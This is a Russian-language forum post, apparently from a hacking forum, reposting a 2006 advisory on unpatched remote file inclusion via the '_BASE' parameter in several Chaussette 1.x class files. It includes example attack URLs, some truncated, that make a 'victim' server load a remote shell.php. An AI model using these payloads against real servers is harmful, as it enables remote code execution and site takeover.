• XSS.stack #1 – первый литературный журнал от юзеров форума

Web Chaussette 1.x - File Inclusion Vulnerabilities

ENFIX

(L3) cache
Пользователь
Регистрация
05.06.2006
Сообщения
236
Реакции
0
Chaussette "_BASE" - File Inclusion Vulnerabilities
Дата Выпуска: 2006-08-11
Уровень: Высоко критический
Решение: Неисправленно
ПО: Chaussette 1.x
Описание:
Входящие данные в параметре "_BASE" в classes/Evenement.php, classes/Event.php. classes/Event_for_month.php, classes/Event_for_week.php, classes/My_Log.php, classes/Event_for_month_per_day.php и classes/My_Smarty.php должным образом не фильтруются перед использованием при загрузке файла. Это может эксплуатироваться, чтобы залить произвольные файлы.
Примеры:
Код:
www.site.com/classes/Evenement.php?_BASE= 
www.site.com/classes/Event_for_week.php?_BASE=  
www.site.com/classes/My_Log.php?_BASE=
 
Вот ещё кое-что он ней:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "_BASE" в различных сценариях. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Пример:

http://victim/dir_Chaussette/Classes/Evene...e.com/shell.php
http://victim/dir_Chaussette/Classes/Event...e.com/shell.php
http://victim/dir_Chaussette/Classes/Event...e.com/shell.php
http://victim/dir_Chaussette/Classes/Event...e.com/shell.php
http://victim/dir_Chaussette/Classes/My_Lo...e.com/shell.php
http://victim/dir_Chaussette/Classes/My_Sm...e.com/shell.php

URL производителя: chaussette.bibimax.homedns.org

Решение: Способов устранения уязвимости не существует в настоящее время.

Источник:
Chaussette <= 080706 (_BASE) Remote File Inc
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх